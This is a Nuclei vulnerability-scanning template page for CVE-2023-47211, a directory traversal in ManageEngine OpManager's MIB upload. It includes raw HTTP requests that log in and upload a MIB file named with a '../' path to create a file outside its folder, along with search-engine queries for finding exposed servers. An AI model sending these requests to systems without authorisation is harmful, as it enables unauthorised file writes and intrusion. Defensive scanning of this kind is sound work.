ManageEngine OpManager - Directory Traversal

ID: CVE-2023-47211

Severity: high

Author: gy741

Tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp

Description

A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.

YAML Source

id: CVE-2023-47211

info:
  name: ManageEngine OpManager - Directory Traversal
  author: gy741
  severity: high
  description: |
    A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47211
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
    cvss-score: 8.6
    cve-id: CVE-2023-47211
    cwe-id: CWE-22
    epss-score: 0.00164
    epss-percentile: 0.52964
    cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: zohocorp
    product: manageengine_firewall_analyzer
    shodan-query:
      - "http.title:\"OpManager Plus\""
      - http.title:"opmanager plus"
    fofa-query: title="opmanager plus"
    google-query: intitle:"opmanager plus"
  tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp

http:
  - raw:
      - |
        POST /two_factor_auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}

      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN


        IMPORTS
            enterprises
                FROM RFC1155-SMI;

        microsoft       OBJECT IDENTIFIER ::= { enterprises 311 }
        software        OBJECT IDENTIFIER ::= { microsoft 1 }
        systems         OBJECT IDENTIFIER ::= { software 1 }
        os              OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT       OBJECT IDENTIFIER ::= { os 1 }
        windows         OBJECT IDENTIFIER ::= { os 2 }
        workstation     OBJECT IDENTIFIER ::= { windowsNT 1 }
        server          OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc              OBJECT IDENTIFIER ::= { windowsNT 3 }

        END

        -----------------------------372334936941313273904263503262--

      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN


        IMPORTS
            enterprises
                FROM RFC1155-SMI;

        microsoft       OBJECT IDENTIFIER ::= { enterprises 311 }
        software        OBJECT IDENTIFIER ::= { microsoft 1 }
        systems         OBJECT IDENTIFIER ::= { software 1 }
        os              OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT       OBJECT IDENTIFIER ::= { os 1 }
        windows         OBJECT IDENTIFIER ::= { os 2 }
        workstation     OBJECT IDENTIFIER ::= { windowsNT 1 }
        server          OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc              OBJECT IDENTIFIER ::= { windowsNT 3 }

        END

        -----------------------------372334936941313273904263503262--

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "MIBFile with same name already exists")'
        condition: and

    extractors:
      - type: regex
        name: x_zcsrf_token
        group: 1
        part: header
        regex:
          - 'Set-Cookie: opmcsrfcookie=([^;]{50,})'
        internal: true
# digest: 4a0a00473045022100ab81db8984f11467f9b71995467e0b44005b75831e6a420f1b37ea54525c72400220360b01216bc1d302948dc66283d0aa1bf45d648a1ad4c2fd09d407c281890310:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-47211.yaml"

View on Github